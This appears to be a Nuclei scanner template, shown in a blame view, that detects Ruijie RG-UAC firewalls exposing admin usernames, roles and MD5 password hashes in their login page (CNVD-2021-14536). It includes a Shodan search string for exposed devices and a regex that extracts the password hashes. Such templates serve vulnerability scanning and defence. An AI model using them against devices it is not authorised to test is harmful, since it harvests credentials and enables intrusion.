nuclei-templates/http/vulnerabilities/ruijie/ruijie-password-leak.yaml

42 lines
1.4 KiB
YAML
Raw Normal View History

id: ruijie-password-leak
2022-05-06 10:40:24 +00:00
info:
2023-02-14 14:16:56 +00:00
name: RG-UAC Ruijie - Password Hashes Leak
author: ritikchaddha,galoget
2022-05-06 10:40:24 +00:00
severity: high
2023-02-14 14:16:56 +00:00
description: |
Multiple Firewall Devices from vendor Ruijie Networks are affected by an information leakage vulnerability where credentials are included in the source code of the web admin login interface (usernames, roles, MD5 hashes and additional details of each user). Attackers can use this information to illegally access into the vulnerable devices, obtain sensitive device information and change configurations. The vulnerability is identified by CNVD-2021-14536.
2022-05-06 10:40:24 +00:00
reference:
- https://forum.butian.net/share/177
2023-02-14 14:16:56 +00:00
- https://www.ruijie.com.cn/gy/xw-aqtg-zw/86924/
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-14536
metadata:
max-request: 1
2023-02-14 14:16:56 +00:00
verified: true
shodan-query: http.html:"Get_Verify_Info"
tags: password,leak,ruijie,exposure,firewall,router
2022-05-06 10:40:24 +00:00
http:
2022-05-06 10:40:24 +00:00
- method: GET
path:
- "{{BaseURL}}"
2022-05-06 10:40:24 +00:00
matchers-condition: and
matchers:
2023-02-14 14:16:56 +00:00
- type: dsl
dsl:
- 'contains(tolower(body), ''\"role\":\"super_admin\"'')'
- 'contains(tolower(body), ''\"role\":\"guest_admin\"'')'
- 'contains(tolower(body), ''\"role\":\"reporter_admin\"'')'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
2022-05-06 10:40:24 +00:00
part: body
regex:
2023-02-14 14:16:56 +00:00
- '"password":"[a-f0-9]{32}'